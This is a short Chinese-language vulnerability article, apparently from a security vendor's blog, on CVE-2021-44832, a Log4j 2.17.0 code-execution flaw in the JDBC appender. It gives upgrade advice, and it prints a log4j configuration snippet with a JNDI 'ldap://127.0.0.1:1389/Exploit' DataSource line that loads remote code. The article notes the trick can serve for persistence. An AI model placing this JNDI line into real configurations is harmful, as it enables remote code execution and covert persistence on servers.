长亭百川云 - 文章详情

漏洞信息:CVE-2021-44832-apache-log4j-2-17-0 RCE

深潜之眼

57

2024-07-13

0x01 前言

    2021 年 12 月 28 日,有安全人员发布了关于 CVE-2021-44832 – APACHE LOG4J 2.17.0 的信息。

0x02 漏洞利用

`<?xml version="1.0" encoding="UTF-8"?>``<Configuration status="error">`  `<Appenders>`  `<JDBC name="databaseAppender" tableName="dbo.application_log">`         `<DataSource jndiName="java:/comp/env/jdbc/LoggingDataSource" />`     `<Column ...`  `</JDBC>` `</Appenders>``…``</Configuration>`

把 DataSource 标签的内容更改为:

<DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>

即可触发payload。

图解:

验证视频:

0x03 修复建议

  将 Apache Log4j2 升级到 2.17.1、2.12.4 和 2.3.2 或更高版本。

此漏洞利用门槛较高,得先拥有远程访问服务器和更改配置的权限;目前来看,其可作为权限维持的选项之一。

原文链接:https://checkmarx.com/blog/cve-2021-44832-apache-log4j-2-17-0-arbitrary-code-execution-via-jdbcappender-datasource-element/

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2